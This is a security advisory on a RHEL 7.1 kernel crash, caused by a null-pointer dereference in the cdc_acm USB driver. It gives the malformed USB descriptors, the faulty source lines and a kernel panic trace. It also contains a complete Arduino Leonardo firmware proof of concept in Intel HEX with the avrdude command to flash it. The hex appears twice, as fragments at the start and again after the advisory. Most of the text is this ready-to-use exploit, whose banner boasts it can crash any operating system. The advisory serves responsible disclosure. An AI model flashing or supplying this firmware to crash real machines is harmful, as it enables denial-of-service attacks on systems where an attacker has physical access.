:1012C000781F891F9A1FA11D680F791F8A1F911D02
:1012D000A11D6A0F711D811D911DA11D20D009F452
:1012E00068943F912AE0269F11243019305D319394
:1012F000DEF6CF010895462F4770405D4193B3E07D
:101300000FD0C9F7F6CF462F4F70405D4A3318F023
:10131000495D31FD4052419302D0A9F7EACFB4E0D4
:10132000A6959795879577956795BA95C9F700978C
:101330006105710508959B01AC010A2E069457952D
:10134000479537952795BA95C9F7620F731F841F84
:10135000951FA01D0895EE0FFF1F0590F491E02D3D
:1013600009942F923F924F925F926F927F928F9249
:101370009F92AF92BF92CF92DF92EF92FF920F9324
:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E
:10139000F894DEBF0FBECDBF09942A8839884888EB
:1013A0005F846E847D848C849B84AA84B984C88481
:1013B000DF80EE80FD800C811B81AA81B981CE0F78
:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D
:0413D000F894FFCFBF
:1013D4001201000200000040AD0BEFBE000101024B
:1013E4000001220342006100640020004200410029
:1013F40042004500250078002500780025006E0095
:1014040025007000180342004100440020004300FE
:10141400300046004600450045002100120100024C
:1014240000000040B4040055000101020301090258
:10143400270001010000FA0705810304040C0705D5
:10144400010204000C0705820104000C07000700D8
:101454000700480100500072006F006C00690066CC
:101464000069006300000A550000006BFD180A00C3
:10147400809F0AB901312B940A8101128946001315
:10148400000257028B0A5E0AF80A5F01F212010099
:1014940002010000400D055702000101020301B9D9
:1014A4000A0100F80A5F0A810A220342006100640B
:1014B400002000420041004200450025007800253C
:1014C40000780025006E00250070001803420041DA
:1014D400004400200043003000460046004500451B
:1014E40000210012010002010000400D0557020016
:1014F400010102030109040000030100000003F2DA
:101504000AEC0A0902270001010000FA01AB0A09EA
:101514000400000301000000090200202020202014
:101524005F5F5F5F5F5F5F5F2020202020202020BF
:1015340020202020202020202020202020202020A7
:1015440020205F5F5F5F5F205F5F20205F2020209F
:101554002020205F5F0A0D00202020202F205F5FC5
:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3
:101574005F5F20205F5F5F5F5F20202020202F209F
:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3
:10159400202F5F5F0A0D002020202F202F202020E5
:1015A4002F205F5F205C2F205F5F20602F205F5F14
:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A
:1015C400205C2F205F5F2F202F205F5F5F2F202F55
:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009
:1015E4002F202F202F202F5F2F202F202F5F2F2001
:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0
:101604002F202F5F2F202F202F5F5F2F202C3C0AAD
:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07
:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F
:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4
:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044
:101654003C3C2043485241534820414E59204F506E
:1016640045524154494E472053595354454D203E09
:101674003E0A0D00203C3C202863292053657267F4
:10168400656A20536368756D696C6F20323031353B
:101694002C204F70656E536F7572636520536563BC
:1016A40075726974792052616C66205370656E6E30
:1016B4006562657267203E3E0A0D000A3E3E205078
:1016C4007265737320627574746F6E20746F207307
:1016D4007461727420657865637574696F6E2E2EFB
:1016E4002E0A0D005B44454255475D2045786563ED
:1016F400757465207061796C6F616420300A0D0027
:10170400526563762D446174613A0A0D005B444569
:101714004255475D200953656E6420436F6E6669C8
:101724006775726174696F6E44657363726970740E
:101734006F720928696E6465783A2569292E2E2E00
:101744000D0A005B44454255475D200953656E64AC
:1017540020496E74657266616365204465736372C3
:101764006970746F720928696E7465726661636565
:101774003A2569292E2E2E0D0A005B444542554711
:101784005D200953656E6420456E64706F696E74E4
:101794002044657363726970746F720928656E649E
:1017A400706F696E743A2569292E2E2E0D0A005B1E
:1017B40044454255475D203C3C70616E6963206D31
:1017C4006F64653F3E3E0D0A005B44454255475DEC
:1017D4002009203E3E20537472696E67204465736D
:1017E40063726970746F72207265717565737420A9
:1017F4002D2073656E64696E67206D616C666F720F
:101804006D656420737472696E67212073657475E5
:10181400702E7756616C75654C203D3D2025690D11
:101824000A005B48455844554D505D0A0D0025306B
:041834003258200006
:00000001FF
--
HireHackking 
OS-S Security Advisory 2016-06
Linux cdc_acm Nullpointer Dereference

Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid 
USB device descriptors (cdc_acm driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the 
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of Advisory: https://os-s.net/advisories/OSS-2016-06_cdc_acm.pdf

Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB 
device requiring the cdc_acm driver.

Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.

Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo 
(github.com/schumilo) using the following device descriptor:

[*] Device-Descriptor
bLength:	0x12
bDescriptorType:	0x1
bcdUSB:	0x200
bDeviceClass:	0x3
bDeviceSubClass:	0x0
bDeviceProtocol:	0x0
bMaxPacketSize:	0x40
idVendor:	0x482
idProduct:	0x203
bcdDevice:	0x100
iManufacturer:	0x1
iProduct:	0x2
iSerialNumbers:	0x3
bNumConfigurations:	0x1

This is the configuration descriptor containing only one interface descriptor.
The cdc-acm driver assumes that there will be at least two interface-
descriptors with associated endpoint-descriptors. 
Since the cdc-acm driver is expecting a second interface descriptor, the 
driver tries to dereference a null-pointer.
This results in a crash of the system.

****
$ nm cdc-acm.ko.debug | grep acm_probe
0000000000001530 t acm_probe
$ addr2line -e cdc-acm.ko.debug 0x179C
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
64/drivers/usb/class/cdc-
acm.c:1229
****

**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/class/cdc-acm.c)
...
1093	/* handle quirks deadly to normal probing*/
1094	if (quirks == NO_UNION_NORMAL) {
1095	data_interface = usb_ifnum_to_if(usb_dev, 1); /* possible null-
pointer */
1096	control_interface = usb_ifnum_to_if(usb_dev, 0);
1097	goto skip_normal_probe;
1098	}
...
1226 skip_normal_probe:
1227
1228	/*workaround for switched interfaces */
1229	if (data_interface->cur_altsetting->desc.bInterfaceClass /* null-
pointer dereference */
1230	!= CDC_DATA_INTERFACE_TYPE) {
1231	if (control_interface->cur_altsetting->desc.bInterfaceC
...
****

[*] Configuration-Descriptor
bLength:	0x9
bDescriptorType:	0x2
wTotalLength:	0x27
bNumInterfaces:	0x1
bConfigurationValue:	0x1
iConfiguration:	0x0
bmAttributes:	0x0
bMaxPower:	0x31
[*] Interface-Descriptor
bLength:	0x9
bDescriptorType:	0x4
bInterfaceNumber:	0x0
bAlternateSetting:	0x0
bNumEndpoints:	0x0
bInterfaceClass:	0x0
bInterfaceSubClass:	0x0
bInterfaceProtocol:	0x0
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x81
bmAttribut:	0x3
wMaxPacketSize:	0x404
bInterval:	0xc
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x1
bmAttribut:	0x2
wMaxPacketSize:	0x4
bInterval:	0xc
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x82
bmAttribut:	0x1
wMaxPacketSize:	0x4
bInterval:	0xc

Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This 
firmware will emulate the defective USB device.

avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U 
flash:w:binary.hex

The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to 
connect port D3 and 3V3!

Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware, 
only physical access to the system is required.

Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
To this day, no security patch was provided by the vendor.
Since our 90-day Responsible Discourse deadline is expired, we publish this 
Security Advisory.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283366

Kernel Stacktrace:

[ 32.550821] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 32.765575] usb 1-1: New USB device found, idVendor=0482, idProduct=0203
[ 32.775042] usb 1-1: New USB device strings: Mfr=1, Product=2, 
SerialNumber=3
[ 32.780788] usb 1-1: Product: Ä?
[ 32.783389] usb 1-1: Manufacturer: Ä?
[ 32.786534] usb 1-1: SerialNumber: %
[ 32.794914] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc 
says 96 microframes
[ 32.850587] BUG: unable to handle kernel NULL pointer dereference at 
0000000000000008
[ 32.851028] IP: [<ffffffffa039479c>] acm_probe+0x26c/0x11d0 [cdc_acm]
[ 32.851028] PGD 0 
[ 32.851028] Oops: 0000 [#1] SMP 
[ 32.851028] Modules linked in: cdc_acm(+) ip6t_rpfilter ip6t_REJECT 
ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc 
ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 
nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter 
ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat 
nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter 
ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper 
drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c 
sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix 
libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 32.851028] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted 
3.10.0-229.14.1.el7.x86_64 #1
[ 32.851028] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 32.851028] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
[ 32.851028] RIP: 0010:[<ffffffffa039479c>] [<ffffffffa039479c>] 
acm_probe+0x26c/0x11d0 [cdc_acm]
[ 32.851028] RSP: 0018:ffff88000bd23b40 EFLAGS: 00010246
[ 32.851028] RAX: ffff88000c525800 RBX: 0000000000000000 RCX: ffff88000bd23fd8
[ 32.851028] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff88000c524c00
[ 32.851028] RBP: ffff88000bd23bd8 R08: 0000000000000001 R09: 0000000000000000
[ 32.851028] R10: 0000000000002cad R11: ffffffff810020d8 R12: ffff88000c525800
[ 32.851028] R13: ffff88000f508692 R14: 0000000000000001 R15: ffff88000bcd0000
[ 32.851028] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) 
knlGS:0000000000000000
[ 32.851028] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 32.851028] CR2: 0000000000000008 CR3: 000000000cb87000 CR4: 
00000000000006f0
[ 32.851028] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 
0000000000000000
[ 32.851028] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 32.851028] Stack:
[ 32.851028] ffff88000bd23ba8 ffff88000d6b3690 ffff88000bd23ba8 00000000436261cb
[ 32.851028] ffff88000bcd0090 0000000000000004 ffff88000bcd0090 
0000000000000202
[ 32.851028] 0000001000000001 0000000000000200 0000000000000000 
ffff88000bd23bd8
[ 32.851028] Call Trace:
[ 32.851028] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 32.851028] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 32.851028] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 32.851028] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 32.851028] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 32.851028] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 32.851028] [<ffffffff813d2680>] bus_add_driver+0x200/0x2d0
[ 32.851028] [<ffffffff813d3b34>] driver_register+0x64/0xf0
[ 32.851028] [<ffffffff8141c1c2>] usb_register_driver+0x82/0x160
[ 32.851028] [<ffffffffa039d000>] ? 0xffffffffa039cfff
[ 32.851028] [<ffffffffa039d0ba>] acm_init+0xba/0x1000 [cdc_acm]
[ 32.851028] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 32.851028] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 32.851028] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 32.851028] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 32.851028] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 32.851028] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 32.851028] Code: 5f 5d c3 0f 1f 40 00 48 83 7d d0 00 74 d4 44 39 6d c0 74 
0d f6 05 66 4e 00 00 04 0f 85 0f 0e 00 00 48 39 5d d0 0f 84 ea 06 00 00 <48> 
8b 43 08 80 78 05 0a 0f 84 fe 00 00 00 48 8b 45 d0 48 8b 40 
[ 32.851028] RIP [<ffffffffa039479c>] acm_probe+0x26c/0x11d0 [cdc_acm]
[ 32.851028] RSP <ffff88000bd23b40>
[ 32.851028] CR2: 0000000000000008
[ 33.230701] ---[ end trace b239663354a1c556 ]---
[ 33.237071] Kernel panic - not syncing: Fatal exception
[ 33.238044] drm_kms_helper: panic occurred, switching back to text console

Arduino Leonardo Firmware:

:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C4050C942F04CA
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940E02C1
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C5000B030E0302
:1000B000010305032F032F032F03120316031A0353
:1000C000200324032F032A030000000200080E006F
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E4EDF3E102C005900D92A436B107D1
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9404070C940000089545
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B
:1001B00083E00E94300361E087E00E94300361E049
:1001C00088E00E9430030E9459067E012AE9E20E6F
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93D90188
:1002C0009C92F4E01196FC9311971496EC93F9012B
:1002D000DC01292D01900D922A95E1F7FE01EC56E3
:1002E000FF4FDC011B96FC93EE931A971D96BC9270
:1002F000AE921C971183008373836283558344837A
:100300000C5211092CE0F80111922A95E9F721E02D
:10031000D80119962C931997FE01E059FF4F0190CF
:100320000D929A94E1F7F8019387828761E088E063
:100330000E9469038BE492E00E94650688E892E0DF
:100340000E94650687EC92E00E94650686E093E0D5
:100350000E94650682E493E00E9465068FE793E0C1
:100360000E94650684EA93E00E9465068BEE93E0A6
:100370000E94650683E00E949F03892B09F047C015
:100380005E01F3E2AF0EB11C8824839482E1982EC3
:1003900084E194E00E946506BF92AF92DF92CF9213
:1003A000FF92EF921F928F921F930F932DB73EB73C
:1003B000225131090FB6F8943EBF0FBE2DBFADB725
:1003C000BEB71196FE01FB96892D01900D928A957C
:1003D000E1F78DE695E00E94030668E873E180E0AE
:1003E00090E00E947B028DE695E00E944E0660E060
:1003F00087E00E94690368E873E180E090E00E9472
:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E
:1004100070E080E090E00E947B02ACCF1F920F92D0
:100420000FB60F9211242F933F938F939F93AF9307
:10043000BF938091650590916605A0916705B09185
:1004400068053091640523E0230F2D3720F40196D1
:10045000A11DB11D05C026E8230F0296A11DB11DE7
:10046000209364058093650590936605A0936705C6
:10047000B09368058091690590916A05A0916B051C
:10048000B0916C050196A11DB11D809369059093F3
:100490006A05A0936B05B0936C05BF91AF919F91D6
:1004A0008F913F912F910F900FBE0F901F90189535
:1004B0003FB7F8948091690590916A05A0916B050A
:1004C000B0916C0526B5A89B05C02F3F19F0019689
:1004D000A11DB11D3FBF6627782F892F9A2F620F6C
:1004E000711D811D911D42E0660F771F881F991FA6
:1004F0004A95D1F70895CF92DF92EF92FF92CF9372
:10050000DF936B017C010E945802EB01C114D104FE
:10051000E104F10479F00E9458026C1B7D0B683EE7
:100520007340A0F381E0C81AD108E108F108C8516E
:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029
:100540000895789484B5826084BD84B5816084BD4B
:1005500085B5826085BD85B5816085BDEEE6F0E03C
:10056000808181608083E1E8F0E010828081826098
:100570008083808181608083E0E8F0E08081816019
:100580008083E1E9F0E08081826080838081816006
:100590008083E0E9F0E0808181608083E1ECF0E03D
:1005A000808184608083808182608083808181609B
:1005B0008083E3ECF0E0808181608083E0ECF0E018
:1005C000808182608083E2ECF0E0808181608083C2
:1005D000EAE7F0E0808184608083808182608083AC
:1005E000808181608083808180688083089590E02D
:1005F000FC013197EE30F10590F5EA5AFF4F0C946B
:10060000AB09809180008F7703C0809180008F7D3F
:1006100080938000089584B58F7702C084B58F7D64
:1006200084BD0895809190008F7707C080919000DD
:100630008F7D03C080919000877F80939000089504
:100640008091C0008F7703C08091C0008F7D809320
:10065000C00008958091C200877F8093C2000895F2
:10066000CF93DF9390E0FC01EA51FF4F2491FC010E
:10067000EC5FFE4F8491882349F190E0880F991F29
:10068000FC01E25CFE4FA591B491805D9E4FFC01A0
:10069000C591D4919FB7611108C0F8948C912095B1
:1006A00082238C93888182230AC0623051F4F894AB
:1006B0008C91322F309583238C938881822B888371
:1006C00004C0F8948C91822B8C939FBFDF91CF91C3
:1006D00008950F931F93CF93DF931F92CDB7DEB78B
:1006E000282F30E0F901E853FF4F8491F901EA51D6
:1006F000FF4F1491F901EC5FFE4F04910023C9F004
:10070000882321F069830E94F7026981E02FF0E0DD
:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7
:100720008C91611103C01095812301C0812B8C93A2
:100730009FBF0F90DF91CF911F910F910895CF939D
:10074000DF93282F30E0F901E853FF4F8491F9013E
:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5
:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5
:10077000EE5DFE4FA591B4912C912D2381E090E088
:1007800021F480E002C080E090E0DF91CF910895F5
:10079000615030F02091F100FC0120830196F8CFE8
:1007A000289884E680937D0508951092E9001092C0
:1007B00071051092700590936F0580936E050895F2
:1007C000FF920F931F93CF93DF93F82E8B01EA01D3
:1007D000BA01C8010E94A606F80120E030E08EEFC1
:1007E0002C173D0791F1F7FE02C0A49101C0A08132
:1007F000609170057091710540916E0550916F0583
:1008000064177507ACF49091E8009570E1F390914E
:10081000E80092FD1CC0A093F100A0917005B0917A
:1008200071051196AF73BB27AB2B11F48093E800D1
:10083000A0917005B09171051196B0937105A093C8
:1008400070052F5F3F4F3196CBCFC90102C08FEFAC
:100850009FEFDF91CF911F910F91FF9008951F920D
:100860000F920FB60F9211246F927F928F929F92E8
:10087000AF92BF92CF92DF92EF92FF920F931F93AE
:100880002F933F934F935F936F937F938F939F9398
:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3
:1008A0006297DEBFCDBF1092E9008091E80083FF20
:1008B00046C168E0CE010A960E94C80382EF809389
:1008C000E8009A8597FF05C08091E80080FFFCCF83
:1008D00003C08EEF8093E800892F807609F023C152
:1008E0008B85811105C01092F1001092F10020C19A
:1008F000282F2D7F213009F41BC1853049F48091C8
:10090000E80080FFFCCF8C8580688093E30010C1F5
:10091000863009F0E1C02D8508891989223009F057
:10092000B3C0EC848E2D90E0209173053091740556
:10093000821793070CF09FC00E94D5031F92EF927D
:100940008DE394E09F938F930E9483068CE0E89E52
:1009500070011124E0917505F0917605EE0DFF1DF3
:1009600089E0DE01119601900D928A95E1F7C801A8
:100970000E94D50349E050E0BE016F5F7F4F80E0E9
:100980000E94E0030F900F900F900F90C12CD12C7C
:10099000612C712C33E7A32E34E0B32E4AEA842E67
:1009A00044E0942EE0917505F0917605EE0DFF1D63
:1009B000818590E0681679060CF0BAC07F926F923C
:1009C000BF92AF920E948306E0917505F091760583
:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5
:1009E00080E00E94E0030F900F900F900F9000E0C6
:1009F00010E0E0917505F0917605EE0DFF1D028483
:100A0000F385E02DEC0DFD1D818590E00817190799
:100A10005CF51F930F939F928F920E948306E09143
:100A20007505F0917605EE0DFF1D0284F385E02D2E
:100A3000EC0DFD1DC801880F991FA485B585A80F71
:100A4000B91F4D915C910284F385E02DE80FF91FE9
:100A50006081718180E00E94E0030F5F1F4F0F9063
:100A60000F900F900F90C5CF8FEF681A780A8EE025
:100A7000C80ED11C97CF8FED94E09F938F930E9467
:100A800083060F900F9058C0C8012A8B0E94D5038F
:100A90002A892130C1F0233009F04EC08C851F9285
:100AA0008F9389EF94E09F938F930E94830642E097
:100AB00050E062E871E080E00E94E0030F900F9048
:100AC0000F900F9035C04091000150E060E071E060
:100AD00080E00E94E0032CC0873071F1883021F45F
:100AE00081E08093F10024C0893011F5937021F5E5
:100AF000EDE4F1E081E021E096E38093E9002093CA
:100B0000EB0034913093EC009093ED008F5F3196C1
:100B1000843099F78EE78093EA001092EA008C8582
:100B20008093720505C0888999890E94D50304C005
:100B30008EEF8093E80003C081E28093EB00629621
:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE
:100B5000EF91BF91AF919F918F917F916F915F9135
:100B60004F913F912F911F910F91FF90EF90DF9048
:100B7000CF90BF90AF909F908F907F906F900F908D
:100B80000FBE0F901F9018951F920F920FB60F92E5
:100B900011248F939F938091E1001092E10083FFD5
:100BA0000FC01092E90091E09093EB001092EC00DE
:100BB00092E39093ED001092720598E09093F0000C
:100BC00082FF1AC080917E05882339F080917E05CE
:100BD000815080937E05882369F080917D0588236C
:100BE00059F080917D05815080937D05811104C06D
:100BF000289A02C05D9AF1CF9F918F910F900FBEFE
:100C00000F901F901895CF93DF93CDB7DEB782E199
:100C1000FE013596A0E0B1E001900D928A95E1F7D2
:100C20008F89988D9093760580937505898D9A8D1F
:100C300090937405809373058B8D9C8D90937C05A8
:100C400080937B058D8D9E8D90937A058093790599
:100C50008F8D98A1909378058093770510927205F7
:100C600081E08093D70080EA8093D80082E189BD3B
:100C700009B400FEFDCF61E070E080E090E00E94EA
:100C80007B0280E98093D8008CE08093E200109290
:100C9000E000559A209ADF91CF91089581E08093EA
:100CA000E00008959091C80095FFFCCF8093CE009E
:100CB00008951092CD0087E68093CC0088E1809360
:100CC000C9008EE08093CA0008950F931F93CF93BD
:100CD000DF93EC018C01FE0101900020E9F73197D0
:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E
:100CF000F80181918F010E945206EDCFDF91CF91D3
:100D00001F910F910895CF93DF93CDB7DEB7DA959A
:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6
:100D2000419151919F0160E071E0CE0101960E94D6
:100D30000707CE0101960E946506D3950FB6F89479
:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE
:100D5000AF92BF92CF92DF92EF92FF920F931F93C9
:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E
:100D70003F932F9389839A830E9483068981882ECB
:100D80009A81992E0F900F9000E010E08EE5E82EEA
:100D900085E0F82E91E1C92E94E0D92E0A151B05A5
:100DA000E4F4F40181914F0190E09F938F93FF92BF
:100DB000EF920E9483060F5F1F4FC8018F70992723
:100DC0000F900F900F900F90892B41F7DF92CF92E9
:100DD0000E9483060F900F90E1CF81E194E09F93F2
:100DE0008F930E9483060F900F900F900F90DF91CA
:100DF000CF911F910F91FF90EF90DF90CF90BF9018
:100E0000AF909F908F900895F8940C94E809AEE00D
:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8
:100E20004C831A83098377FF02C060E070E8615049
:100E300071097E836D83A901BC01CE0101960E94D8
:100E400033074D815E8157FD0AC02F8138854217D7
:100E500053070CF49A01F801E20FF31F10822E964B
:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB
:100E7000B1097C016B018A01FC0117821682838112
:100E800081FFBDC1CE0101964C01F7019381F601AE
:100E900093FD859193FF81916F01882309F4ABC184
:100EA000853239F493FD859193FF81916F018532ED
:100EB00029F4B70190E00E941B09E7CF512C312C97
:100EC00020E02032A0F48B3269F030F4803259F007
:100ED000833269F420612CC08D3239F0803339F4CB
:100EE000216026C02260246023C0286021C027FD25
:100EF00027C030ED380F3A3078F426FF06C0FAE00C
:100F00005F9E300D1124532E13C08AE0389E300DA1
:100F10001124332E20620CC08E3221F426FD6BC1C9
:100F2000206406C08C3611F4206802C0883641F473
:100F3000F60193FD859193FF81916F018111C1CFDE
:100F4000982F9F7D9554933028F40C5F1F4FFFE33B
:100F5000F9830DC0833631F0833771F0833509F0A2
:100F60005BC022C0F801808189830E5F1F4F44243B
:100F70004394512C540115C03801F2E06F0E711CDE
:100F8000F801A080B18026FF03C0652D70E002C08B
:100F90006FEF7FEFC5012C870E9410092C018301A0
:100FA0002C852F77222E17C03801F2E06F0E711CAE
:100FB000F801A080B18026FF03C0652D70E002C05B
:100FC0006FEF7FEFC5012C870E9405092C012C854E
:100FD0002068222E830123FC1BC0832D90E048163D
:100FE0005906B0F4B70180E290E00E941B093A94E0
:100FF000F4CFF50127FC859127FE81915F01B701B0
:1010000090E00E941B0931103A94F1E04F1A510808
:101010004114510471F7E5C0843611F0893639F571
:10102000F80127FF07C060817181828193810C5F85
:101030001F4F08C060817181882777FD8095982FA8
:101040000E5F1F4F2F76B22E97FF09C090958095A7
:10105000709561957F4F8F4F9F4F2068B22E2AE089
:1010600030E0A4010E944D09A82EA81844C085377D
:1010700029F42F7EB22E2AE030E025C0F22FF97F2E
:10108000BF2E8F36C1F018F4883579F0B4C08037A0
:1010900019F0883721F0AFC02F2F2061B22EB4FE97
:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D
:1010B0009660B92E06C028E030E005C020E130E09F
:1010C00002C020E132E0F801B7FE07C06081718103
:1010D000828193810C5F1F4F06C06081718180E027
:1010E00090E00E5F1F4FA4010E944D09A82EA81882
:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428
:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0
:101110007A2C2B2D03C07A2C01C0752C24FF0DC016
:10112000FE01EA0DF11D8081803311F4297E09C092
:1011300022FF06C07394739404C0822F867809F04E
:10114000739423FD13C020FF06C05A2C731418F4A7
:10115000530C5718732C731468F4B70180E290E0B5
:101160002C870E941B0973942C85F5CF731410F4FF
:10117000371801C0312C24FF12C0B70180E390E082
:101180002C870E941B092C8522FF17C021FF03C05A
:1011900088E590E002C088E790E0B7010CC0822F9C
:1011A000867859F021FD02C080E201C08BE227FD64
:1011B0008DE2B70190E00E941B09A51438F4B70135
:1011C00080E390E00E941B095A94F7CFAA94F4019F
:1011D000EA0DF11D8081B70190E00E941B09A1106A
:1011E000F5CF332009F451CEB70180E290E00E94A0
:1011F0001B093A94F6CFF7018681978102C08FEFE1
:101200009FEF2C96E2E10C94CD09FC010590615012
:1012100070400110D8F7809590958E0F9F1F08950C
:10122000FC016150704001900110D8F780959095B5
:101230008E0F9F1F08950F931F93CF93DF93182F47
:10124000092FEB018B8181FD03C08FEF9FEF20C041
:1012500082FF10C04E815F812C813D814217530770
:101260007CF4E881F9819F012F5F3F4F3983288308
:10127000108306C0E885F985812F0995892B29F708
:101280002E813F812F5F3F4F3F832E83812F902FF1
:10129000DF91CF911F910F910895FA01AA2728306D
:1012A00051F1203181F1E8946F936E7F6E5F7F4F33
:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF
:1012C000781F891F9A1FA11D680F791F8A1F911D02
